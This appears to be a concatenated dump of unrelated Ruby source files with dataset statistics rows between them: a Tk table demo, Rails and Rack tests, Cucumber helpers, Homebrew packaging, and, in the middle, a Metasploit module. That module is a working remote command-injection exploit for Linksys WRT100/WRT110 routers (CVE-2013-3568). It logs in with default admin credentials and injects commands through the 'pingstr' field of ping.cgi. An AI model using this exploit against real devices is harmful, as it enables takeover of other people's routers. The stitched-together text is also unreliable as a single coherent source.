table.set([idx,first], anchor)
}
courier = TkFont.new(:family=>'Courier', :size=>10)
table.tag_configure('s', :font=>courier, :justify=>:center)
logo = TkPhotoImage.new(:file=>File.join(File.dirname(File.expand_path(__FILE__)), 'tcllogo.gif'))
table.tag_configure('logo', :image=>logo, :showtext=>true)
table.tag_cell('logo', [1,2], [2,3], [4,1])
table.tag_cell('dis', [2,1], [1,-1], [3,0])
table.set_width([-2,8], [-1,9], [0, 12], [4, 14])
table.set([1,1], "multi-line\ntext\nmight be\ninteresting",
[3,2], "more\nmulti-line\nplaying\n",
[2,2], "null\0byte")
# This is in the row span
l = TkLabel.new(table, :text=>'Window s', :bg=>'yellow')
table.window_configure([6,0], :sticky=>:s, :window=>l)
# This is in the row titles
l = TkLabel.new(table, :text=>'Window ne', :bg=>'yellow')
table.window_configure([4,-1], :sticky=>:ne, :window=>l)
# This will get swallowed by a span
l = TkLabel.new(table, :text=>'Window ew', :bg=>'yellow')
table.window_configure([5,3], :sticky=>:ew, :window=>l)
# This is in the col titles
l = TkLabel.new(table, :text=>'Window news', :bg=>'yellow')
table.window_configure([-5,1], :sticky=>:news, :window=>l)
l = TkLabel.new(table.winfo_parent, :text=>'Sibling l', :bg=>'orange')
table.window_configure([5,1], :sticky=>:news, :window=>l)
if table.span_list.empty?
table.set_spans([-1,-2], [0,3], [1,2], [0,5], [3,2], [2,2], [6,0], [4,0])
end
puts "Table is #{table.path} with array #{(table['variable'])}"
# table.postscript(:file=>'out.ps', :first=>:origin, :last=>[2,2])
Tk.mainloop
| 32.323529 | 98 | 0.598423 |
1ce8ba54ecb1417d64742a45d4e7314965b3f807 | 737 | require 'rails_helper'
describe Authentication, :type => :model do
let(:user) {FactoryGirl.build(:dealer)}
let(:authentication) {FactoryGirl.build(:authentication)}
# skip "add some examples to (or delete) #{__FILE__}"
  # todo: check loading of oauth_data and default_scope
it { should belong_to(:user) }
it 'belongs to User' do
expect(authentication.valid?).to be_truthy
end
it 'requires provider' do
authentication.provider = nil
expect(authentication).not_to be_valid
end
it 'requires provider Id' do
authentication.proid = nil
expect(authentication).not_to be_valid
end
it 'requires user Id' do
authentication.user_id = nil
expect(authentication).not_to be_valid
end
end
| 22.333333 | 59 | 0.719132 |
26d1c3c07ba4097eb8035d8849d63248fad2cf91 | 3,386 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys Devices pingstr Remote Command Injection',
'Description' => %q{
The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command
injection exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
test_login
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end
| 27.983471 | 94 | 0.593621 |
1da703b402b7ca3b87bf4bc7ac93b9284ebaff48 | 1,326 | # -*- coding: utf-8 -*-
# frozen_string_literal: true
module FeatureFactory
def create_feature(name = generate_feature_name)
gherkin = <<-GHERKIN
Feature: #{name}
#{yield}
GHERKIN
write_file filename(name), gherkin
end
def create_feature_ja(name = generate_feature_name)
gherkin = <<-GHERKIN
# language: ja
機能: #{name}
#{yield}
GHERKIN
write_file filename(name), gherkin
end
def create_scenario(name = generate_scenario_name)
<<-GHERKIN
Scenario: #{name}
#{yield}
GHERKIN
end
def create_scenario_ja(name = generate_scenario_name)
<<-GHERKIN
シナリオ: #{name}
#{yield}
GHERKIN
end
def create_step_definition
write_file generate_step_definition_filename, yield
end
def generate_feature_name
"Test Feature #{next_increment(:feature)}"
end
def generate_scenario_name
"Test Scenario #{next_increment(:scenario)}"
end
def next_increment(label)
@increments ||= {}
@increments[label] ||= 0
@increments[label] += 1
end
def generate_step_definition_filename
"features/step_definitions/steps#{next_increment(:step_defs)}.rb"
end
def filename(name)
"features/#{name.downcase.tr(' ', '_')}.feature"
end
def features
in_current_dir do
Dir['features/*.feature']
end
end
end
World(FeatureFactory)
| 19.217391 | 69 | 0.692308 |
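A short sketch of how the FeatureFactory helpers above might be driven from an Aruba/Cucumber support file; the feature name, Gherkin text, and step definition body are illustrative.

create_feature('Login') do
  create_scenario('Successful login') do
    <<-GHERKIN
      Given a registered user
      When the user signs in
      Then the user sees the dashboard
    GHERKIN
  end
end
# Writes features/login.feature; create_step_definition writes an
# auto-numbered file under features/step_definitions/.
create_step_definition do
  "Given('a registered user') { @user = :registered }"
end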
038dda0cdb077d780ad4a1a3d7873c53e94ffc7e | 7,048 | # frozen_string_literal: true
require "abstract_unit"
class MiddlewareStackTest < ActiveSupport::TestCase
class Base
def initialize(app)
@app = app
end
def call(env)
@app.call(env)
end
end
class FooMiddleware < Base; end
class BarMiddleware < Base; end
class BazMiddleware < Base; end
class HiyaMiddleware < Base; end
class BlockMiddleware < Base
attr_reader :block
def initialize(app, &block)
super(app)
@block = block
end
end
def setup
@stack = ActionDispatch::MiddlewareStack.new
@stack.use FooMiddleware
@stack.use BarMiddleware
end
def test_delete_works
assert_difference "@stack.size", -1 do
@stack.delete FooMiddleware
end
end
test "delete ignores middleware not in the stack" do
assert_no_difference "@stack.size" do
@stack.delete BazMiddleware
end
end
test "delete! deletes the middleware" do
assert_difference "@stack.size", -1 do
@stack.delete! FooMiddleware
end
end
test "delete! requires the middleware to be in the stack" do
assert_raises RuntimeError do
@stack.delete! BazMiddleware
end
end
test "use should push middleware as class onto the stack" do
assert_difference "@stack.size" do
@stack.use BazMiddleware
end
assert_equal BazMiddleware, @stack.last.klass
end
test "use should push middleware class with arguments onto the stack" do
assert_difference "@stack.size" do
@stack.use BazMiddleware, true, foo: "bar"
end
assert_equal BazMiddleware, @stack.last.klass
assert_equal([true, { foo: "bar" }], @stack.last.args)
end
test "use should push middleware class with block arguments onto the stack" do
proc = Proc.new { }
assert_difference "@stack.size" do
@stack.use(BlockMiddleware, &proc)
end
assert_equal BlockMiddleware, @stack.last.klass
assert_equal proc, @stack.last.block
end
test "insert inserts middleware at the integer index" do
@stack.insert(1, BazMiddleware)
assert_equal BazMiddleware, @stack[1].klass
end
test "insert_after inserts middleware after the integer index" do
@stack.insert_after(1, BazMiddleware)
assert_equal BazMiddleware, @stack[2].klass
end
test "insert_before inserts middleware before another middleware class" do
@stack.insert_before(BarMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[1].klass
end
test "insert_after inserts middleware after another middleware class" do
@stack.insert_after(BarMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[2].klass
end
test "swaps one middleware out for another" do
assert_equal FooMiddleware, @stack[0].klass
@stack.swap(FooMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[0].klass
end
test "swaps one middleware out for same middleware class" do
assert_equal FooMiddleware, @stack[0].klass
@stack.swap(FooMiddleware, FooMiddleware, Proc.new { |env| [500, {}, ["error!"]] })
assert_equal FooMiddleware, @stack[0].klass
end
test "move moves middleware at the integer index" do
@stack.move(0, BarMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
end
test "move requires the moved middleware to be in the stack" do
assert_raises RuntimeError do
@stack.move(0, BazMiddleware)
end
end
test "move preserves the arguments of the moved middleware" do
@stack.use BazMiddleware, true, foo: "bar"
@stack.move_before(FooMiddleware, BazMiddleware)
assert_equal [true, foo: "bar"], @stack.first.args
end
test "move_before moves middleware before another middleware class" do
@stack.move_before(FooMiddleware, BarMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
end
test "move_after requires the moved middleware to be in the stack" do
assert_raises RuntimeError do
@stack.move_after(BarMiddleware, BazMiddleware)
end
end
test "move_after moves middleware after the integer index" do
@stack.insert_after(BarMiddleware, BazMiddleware)
@stack.move_after(0, BazMiddleware)
assert_equal FooMiddleware, @stack[0].klass
assert_equal BazMiddleware, @stack[1].klass
assert_equal BarMiddleware, @stack[2].klass
end
test "move_after moves middleware after another middleware class" do
@stack.insert_after(BarMiddleware, BazMiddleware)
@stack.move_after(BarMiddleware, FooMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
assert_equal BazMiddleware, @stack[2].klass
end
test "move_afters preserves the arguments of the moved middleware" do
@stack.use BazMiddleware, true, foo: "bar"
@stack.move_after(FooMiddleware, BazMiddleware)
assert_equal [true, foo: "bar"], @stack[1].args
end
test "unshift adds a new middleware at the beginning of the stack" do
@stack.unshift MiddlewareStackTest::BazMiddleware
assert_equal BazMiddleware, @stack.first.klass
end
test "raise an error on invalid index" do
assert_raise RuntimeError do
@stack.insert(HiyaMiddleware, BazMiddleware)
end
assert_raise RuntimeError do
@stack.insert_after(HiyaMiddleware, BazMiddleware)
end
end
test "can check if Middleware are equal - Class" do
assert_equal @stack.last, BarMiddleware
end
test "includes a class" do
assert_equal true, @stack.include?(BarMiddleware)
end
test "can check if Middleware are equal - Middleware" do
assert_equal @stack.last, @stack.last
end
test "instruments the execution of middlewares" do
events = []
subscriber = proc do |*args|
events << ActiveSupport::Notifications::Event.new(*args)
end
ActiveSupport::Notifications.subscribed(subscriber, "process_middleware.action_dispatch") do
app = @stack.build(proc { |env| [200, {}, []] })
env = {}
app.call(env)
end
assert_equal 2, events.count
assert_equal ["MiddlewareStackTest::BarMiddleware", "MiddlewareStackTest::FooMiddleware"], events.map { |e| e.payload[:middleware] }
end
test "includes a middleware" do
assert_equal true, @stack.include?(ActionDispatch::MiddlewareStack::Middleware.new(BarMiddleware, nil, nil))
end
test "referencing Rack::Runtime is deprecated" do
@stack.use ActionDispatch::MiddlewareStack::FakeRuntime
assert_deprecated(/Rack::Runtime is removed/) do
@stack.insert_after(Rack::Runtime, BazMiddleware)
end
end
test "referencing Rack::Runtime is not deprecated if added" do
assert_not_deprecated do
@stack.use Rack::Runtime
@stack.insert_before(Rack::Runtime, BazMiddleware)
end
end
test "referencing FakeRuntime throws an error" do
@stack.use ActionDispatch::MiddlewareStack::FakeRuntime
assert_raises RuntimeError do
@stack.insert_after ActionDispatch::MiddlewareStack::FakeRuntime, BazMiddleware
end
end
end
| 29.366667 | 136 | 0.722758 |
18d0e4f207704b206b852458544b4034e302a3dd | 674 | cask 'qutebrowser' do
version '1.8.3'
sha256 '547fe56e784771033c7d16b19327d49cb79509309de78c3ee5bf54fb976abcd6'
# github.com/qutebrowser/qutebrowser was verified as official when first introduced to the cask
url "https://github.com/qutebrowser/qutebrowser/releases/download/v#{version}/qutebrowser-#{version}.dmg"
appcast 'https://github.com/qutebrowser/qutebrowser/releases.atom'
name 'qutebrowser'
homepage 'https://www.qutebrowser.org/'
app 'qutebrowser.app'
zap trash: [
'~/Library/Application Support/qutebrowser',
'~/Library/Caches/qutebrowser',
'~/Library/Preferences/qutebrowser',
]
end
| 35.473684 | 107 | 0.709199 |
ab695d0e3c7dbfa6754279f7cf8bd4c051e5d25d | 2,895 | class Monetdb < Formula
desc "Column-store database"
homepage "https://www.monetdb.org/"
url "https://www.monetdb.org/downloads/sources/Jul2021-SP1/MonetDB-11.41.11.tar.xz"
sha256 "2e81a98e06820dfaf56770af027e8da4a8dcc533d3599b9cc2b5a2e1efdc07af"
license "MPL-2.0"
head "https://dev.monetdb.org/hg/MonetDB", using: :hg
livecheck do
url "https://www.monetdb.org/downloads/sources/Latest/"
regex(/href=.*?MonetDB[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
rebuild 1
sha256 arm64_monterey: "8bc5834738874ae3eff597b62da4a34666ada63521a830570c5b52670c706efa"
sha256 arm64_big_sur: "c3491e3822ad616ff62a23e7021602cbf0570b1bf4dd9a017aaa6f06d8e8f1e7"
sha256 monterey: "3c4655151f5defc6591f8de60e5abcdd1bf6a829ef6db47655c4bf5568116f02"
sha256 big_sur: "9b508ef49cdeca5aea1756bc7a31e84bf333aa05d1e4e17cb8b5b779c8641304"
sha256 catalina: "892532ddfa04ed8ab911227e8b1721d198b66281dd3614212d195d047474c41a"
sha256 x86_64_linux: "17e9eff85b2fe70e58bda46e6fa6a4c02ee8122cfa85707c6de985f948f8a579"
end
depends_on "bison" => :build # macOS bison is too old
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]" => :build
depends_on "lz4"
depends_on "[email protected]"
depends_on "pcre"
depends_on "readline" # Compilation fails with libedit
depends_on "xz"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args,
"-DRELEASE_VERSION=ON",
"-DASSERT=OFF",
"-DSTRICT=OFF",
"-DTESTING=OFF",
"-DFITS=OFF",
"-DGEOM=OFF",
"-DNETCDF=OFF",
"-DODBC=OFF",
"-DPY3INTEGRATION=OFF",
"-DRINTEGRATION=OFF",
"-DSHP=OFF",
"-DWITH_BZ2=ON",
"-DWITH_CMOCKA=OFF",
"-DWITH_CURL=ON",
"-DWITH_LZ4=ON",
"-DWITH_LZMA=ON",
"-DWITH_PCRE=ON",
"-DWITH_PROJ=OFF",
"-DWITH_SNAPPY=OFF",
"-DWITH_XML2=ON",
"-DWITH_ZLIB=ON",
"-DOPENSSL_ROOT_DIR=#{Formula["[email protected]"].opt_prefix}",
"-DREADLINE_ROOT=#{Formula["readline"].opt_prefix}"
# remove reference to shims directory from compilation/linking info
inreplace "tools/mserver/monet_version.c", %r{"/[^ ]*/}, "\""
system "cmake", "--build", "."
system "cmake", "--build", ".", "--target", "install"
end
end
test do
# assert_match "Usage", shell_output("#{bin}/mclient --help 2>&1")
system("#{bin}/monetdbd", "create", "#{testpath}/dbfarm")
assert_predicate testpath/"dbfarm", :exist?
end
end
| 39.657534 | 93 | 0.584801 |
79d0f1c1dce47ddd1421bf8c73b3eb30657b8a7a | 28,956 | require 'rack/utils'
require 'rack/mock'
describe Rack::Utils do
should "escape correctly" do
Rack::Utils.escape("fo<o>bar").should.equal "fo%3Co%3Ebar"
Rack::Utils.escape("a space").should.equal "a+space"
Rack::Utils.escape("q1!2\"'w$5&7/z8)?\\").
should.equal "q1%212%22%27w%245%267%2Fz8%29%3F%5C"
end
should "escape correctly for multibyte characters" do
matz_name = "\xE3\x81\xBE\xE3\x81\xA4\xE3\x82\x82\xE3\x81\xA8".unpack("a*")[0] # Matsumoto
matz_name.force_encoding("UTF-8") if matz_name.respond_to? :force_encoding
Rack::Utils.escape(matz_name).should.equal '%E3%81%BE%E3%81%A4%E3%82%82%E3%81%A8'
matz_name_sep = "\xE3\x81\xBE\xE3\x81\xA4 \xE3\x82\x82\xE3\x81\xA8".unpack("a*")[0] # Matsu moto
matz_name_sep.force_encoding("UTF-8") if matz_name_sep.respond_to? :force_encoding
Rack::Utils.escape(matz_name_sep).should.equal '%E3%81%BE%E3%81%A4+%E3%82%82%E3%81%A8'
end
should "unescape correctly" do
Rack::Utils.unescape("fo%3Co%3Ebar").should.equal "fo<o>bar"
Rack::Utils.unescape("a+space").should.equal "a space"
Rack::Utils.unescape("a%20space").should.equal "a space"
Rack::Utils.unescape("q1%212%22%27w%245%267%2Fz8%29%3F%5C").
should.equal "q1!2\"'w$5&7/z8)?\\"
end
should "parse query strings correctly" do
Rack::Utils.parse_query("foo=bar").
should.equal "foo" => "bar"
Rack::Utils.parse_query("foo=\"bar\"").
should.equal "foo" => "\"bar\""
Rack::Utils.parse_query("foo=bar&foo=quux").
should.equal "foo" => ["bar", "quux"]
Rack::Utils.parse_query("foo=1&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_query("my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F").
should.equal "my weird field" => "q1!2\"'w$5&7/z8)?"
Rack::Utils.parse_query("foo%3Dbaz=bar").should.equal "foo=baz" => "bar"
end
should "parse nested query strings correctly" do
Rack::Utils.parse_nested_query("foo").
should.equal "foo" => nil
Rack::Utils.parse_nested_query("foo=").
should.equal "foo" => ""
Rack::Utils.parse_nested_query("foo=bar").
should.equal "foo" => "bar"
Rack::Utils.parse_nested_query("foo=\"bar\"").
should.equal "foo" => "\"bar\""
Rack::Utils.parse_nested_query("foo=bar&foo=quux").
should.equal "foo" => "quux"
Rack::Utils.parse_nested_query("foo&foo=").
should.equal "foo" => ""
Rack::Utils.parse_nested_query("foo=1&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_nested_query("&foo=1&&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_nested_query("foo&bar=").
should.equal "foo" => nil, "bar" => ""
Rack::Utils.parse_nested_query("foo=bar&baz=").
should.equal "foo" => "bar", "baz" => ""
Rack::Utils.parse_nested_query("my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F").
should.equal "my weird field" => "q1!2\"'w$5&7/z8)?"
Rack::Utils.parse_nested_query("foo[]").
should.equal "foo" => [nil]
Rack::Utils.parse_nested_query("foo[]=").
should.equal "foo" => [""]
Rack::Utils.parse_nested_query("foo[]=bar").
should.equal "foo" => ["bar"]
Rack::Utils.parse_nested_query("foo[]=1&foo[]=2").
should.equal "foo" => ["1", "2"]
Rack::Utils.parse_nested_query("foo=bar&baz[]=1&baz[]=2&baz[]=3").
should.equal "foo" => "bar", "baz" => ["1", "2", "3"]
Rack::Utils.parse_nested_query("foo[]=bar&baz[]=1&baz[]=2&baz[]=3").
should.equal "foo" => ["bar"], "baz" => ["1", "2", "3"]
Rack::Utils.parse_nested_query("x[y][z]=1").
should.equal "x" => {"y" => {"z" => "1"}}
Rack::Utils.parse_nested_query("x[y][z][]=1").
should.equal "x" => {"y" => {"z" => ["1"]}}
Rack::Utils.parse_nested_query("x[y][z]=1&x[y][z]=2").
should.equal "x" => {"y" => {"z" => "2"}}
Rack::Utils.parse_nested_query("x[y][z][]=1&x[y][z][]=2").
should.equal "x" => {"y" => {"z" => ["1", "2"]}}
Rack::Utils.parse_nested_query("x[y][][z]=1").
should.equal "x" => {"y" => [{"z" => "1"}]}
Rack::Utils.parse_nested_query("x[y][][z][]=1").
should.equal "x" => {"y" => [{"z" => ["1"]}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][w]=2").
should.equal "x" => {"y" => [{"z" => "1", "w" => "2"}]}
Rack::Utils.parse_nested_query("x[y][][v][w]=1").
should.equal "x" => {"y" => [{"v" => {"w" => "1"}}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][v][w]=2").
should.equal "x" => {"y" => [{"z" => "1", "v" => {"w" => "2"}}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][z]=2").
should.equal "x" => {"y" => [{"z" => "1"}, {"z" => "2"}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][w]=a&x[y][][z]=2&x[y][][w]=3").
should.equal "x" => {"y" => [{"z" => "1", "w" => "a"}, {"z" => "2", "w" => "3"}]}
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[y]z=2") }.
should.raise(TypeError).
message.should.equal "expected Hash (got String) for param `y'"
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[]=1") }.
should.raise(TypeError).
message.should.equal "expected Array (got Hash) for param `x'"
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[y][][w]=2") }.
should.raise(TypeError).
message.should.equal "expected Array (got String) for param `y'"
end
should "build query strings correctly" do
Rack::Utils.build_query("foo" => "bar").should.equal "foo=bar"
Rack::Utils.build_query("foo" => ["bar", "quux"]).
should.equal "foo=bar&foo=quux"
Rack::Utils.build_query("foo" => "1", "bar" => "2").
should.equal "foo=1&bar=2"
Rack::Utils.build_query("my weird field" => "q1!2\"'w$5&7/z8)?").
should.equal "my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F"
end
should "build nested query strings correctly" do
Rack::Utils.build_nested_query("foo" => nil).should.equal "foo"
Rack::Utils.build_nested_query("foo" => "").should.equal "foo="
Rack::Utils.build_nested_query("foo" => "bar").should.equal "foo=bar"
Rack::Utils.build_nested_query("foo" => "1", "bar" => "2").
should.equal "foo=1&bar=2"
Rack::Utils.build_nested_query("my weird field" => "q1!2\"'w$5&7/z8)?").
should.equal "my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F"
Rack::Utils.build_nested_query("foo" => [nil]).
should.equal "foo[]"
Rack::Utils.build_nested_query("foo" => [""]).
should.equal "foo[]="
Rack::Utils.build_nested_query("foo" => ["bar"]).
should.equal "foo[]=bar"
# The ordering of the output query string is unpredictable with 1.8's
# unordered hash. Test that build_nested_query performs the inverse
# function of parse_nested_query.
[{"foo" => nil, "bar" => ""},
{"foo" => "bar", "baz" => ""},
{"foo" => ["1", "2"]},
{"foo" => "bar", "baz" => ["1", "2", "3"]},
{"foo" => ["bar"], "baz" => ["1", "2", "3"]},
{"foo" => ["1", "2"]},
{"foo" => "bar", "baz" => ["1", "2", "3"]},
{"x" => {"y" => {"z" => "1"}}},
{"x" => {"y" => {"z" => ["1"]}}},
{"x" => {"y" => {"z" => ["1", "2"]}}},
{"x" => {"y" => [{"z" => "1"}]}},
{"x" => {"y" => [{"z" => ["1"]}]}},
{"x" => {"y" => [{"z" => "1", "w" => "2"}]}},
{"x" => {"y" => [{"v" => {"w" => "1"}}]}},
{"x" => {"y" => [{"z" => "1", "v" => {"w" => "2"}}]}},
{"x" => {"y" => [{"z" => "1"}, {"z" => "2"}]}},
{"x" => {"y" => [{"z" => "1", "w" => "a"}, {"z" => "2", "w" => "3"}]}}
].each { |params|
qs = Rack::Utils.build_nested_query(params)
Rack::Utils.parse_nested_query(qs).should.equal params
}
lambda { Rack::Utils.build_nested_query("foo=bar") }.
should.raise(ArgumentError).
message.should.equal "value must be a Hash"
end
should "should escape html entities [&><'\"/]" do
Rack::Utils.escape_html("foo").should.equal "foo"
Rack::Utils.escape_html("f&o").should.equal "f&o"
Rack::Utils.escape_html("f<o").should.equal "f<o"
Rack::Utils.escape_html("f>o").should.equal "f>o"
Rack::Utils.escape_html("f'o").should.equal "f'o"
Rack::Utils.escape_html('f"o').should.equal "f"o"
Rack::Utils.escape_html("f/o").should.equal "f/o"
Rack::Utils.escape_html("<foo></foo>").should.equal "<foo></foo>"
end
should "figure out which encodings are acceptable" do
helper = lambda do |a, b|
request = Rack::Request.new(Rack::MockRequest.env_for("", "HTTP_ACCEPT_ENCODING" => a))
Rack::Utils.select_best_encoding(a, b)
end
helper.call(%w(), [["x", 1]]).should.equal(nil)
helper.call(%w(identity), [["identity", 0.0]]).should.equal(nil)
helper.call(%w(identity), [["*", 0.0]]).should.equal(nil)
helper.call(%w(identity), [["compress", 1.0], ["gzip", 1.0]]).should.equal("identity")
helper.call(%w(compress gzip identity), [["compress", 1.0], ["gzip", 1.0]]).should.equal("compress")
helper.call(%w(compress gzip identity), [["compress", 0.5], ["gzip", 1.0]]).should.equal("gzip")
helper.call(%w(foo bar identity), []).should.equal("identity")
helper.call(%w(foo bar identity), [["*", 1.0]]).should.equal("foo")
helper.call(%w(foo bar identity), [["*", 1.0], ["foo", 0.9]]).should.equal("bar")
helper.call(%w(foo bar identity), [["foo", 0], ["bar", 0]]).should.equal("identity")
helper.call(%w(foo bar baz identity), [["*", 0], ["identity", 0.1]]).should.equal("identity")
end
should "return the bytesize of String" do
Rack::Utils.bytesize("FOO\xE2\x82\xAC").should.equal 6
end
should "return status code for integer" do
Rack::Utils.status_code(200).should.equal 200
end
should "return status code for string" do
Rack::Utils.status_code("200").should.equal 200
end
should "return status code for symbol" do
Rack::Utils.status_code(:ok).should.equal 200
end
end
describe Rack::Utils, "byte_range" do
should "ignore missing or syntactically invalid byte ranges" do
Rack::Utils.byte_ranges({},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "foobar"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "furlongs=123-456"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes="},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123,456"},500).should.equal nil
# A range of non-positive length is syntactically invalid and ignored:
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=456-123"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=456-455"},500).should.equal nil
end
should "parse simple byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-456"},500).should.equal [(123..456)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-"},500).should.equal [(123..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-100"},500).should.equal [(400..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-0"},500).should.equal [(0..0)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=499-499"},500).should.equal [(499..499)]
end
should "truncate byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-999"},500).should.equal [(123..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=600-999"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-999"},500).should.equal [(0..499)]
end
should "ignore unsatisfiable byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=500-501"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=500-"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=999-"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-0"},500).should.equal []
end
should "handle byte ranges of empty files" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-456"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-100"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-0"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-0"},0).should.equal []
end
end
describe Rack::Utils::HeaderHash do
should "retain header case" do
h = Rack::Utils::HeaderHash.new("Content-MD5" => "d5ff4e2a0 ...")
h['ETag'] = 'Boo!'
h.to_hash.should.equal "Content-MD5" => "d5ff4e2a0 ...", "ETag" => 'Boo!'
end
should "check existence of keys case insensitively" do
h = Rack::Utils::HeaderHash.new("Content-MD5" => "d5ff4e2a0 ...")
h.should.include 'content-md5'
h.should.not.include 'ETag'
end
should "merge case-insensitively" do
h = Rack::Utils::HeaderHash.new("ETag" => 'HELLO', "content-length" => '123')
merged = h.merge("Etag" => 'WORLD', 'Content-Length' => '321', "Foo" => 'BAR')
merged.should.equal "Etag"=>'WORLD', "Content-Length"=>'321', "Foo"=>'BAR'
end
should "overwrite case insensitively and assume the new key's case" do
h = Rack::Utils::HeaderHash.new("Foo-Bar" => "baz")
h["foo-bar"] = "bizzle"
h["FOO-BAR"].should.equal "bizzle"
h.length.should.equal 1
h.to_hash.should.equal "foo-bar" => "bizzle"
end
should "be converted to real Hash" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.to_hash.should.be.instance_of Hash
end
should "convert Array values to Strings when converting to Hash" do
h = Rack::Utils::HeaderHash.new("foo" => ["bar", "baz"])
h.to_hash.should.equal({ "foo" => "bar\nbaz" })
end
should "replace hashes correctly" do
h = Rack::Utils::HeaderHash.new("Foo-Bar" => "baz")
j = {"foo" => "bar"}
h.replace(j)
h["foo"].should.equal "bar"
end
should "be able to delete the given key case-sensitively" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("foo")
h["foo"].should.be.nil
h["FOO"].should.be.nil
end
should "be able to delete the given key case-insensitively" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("FOO")
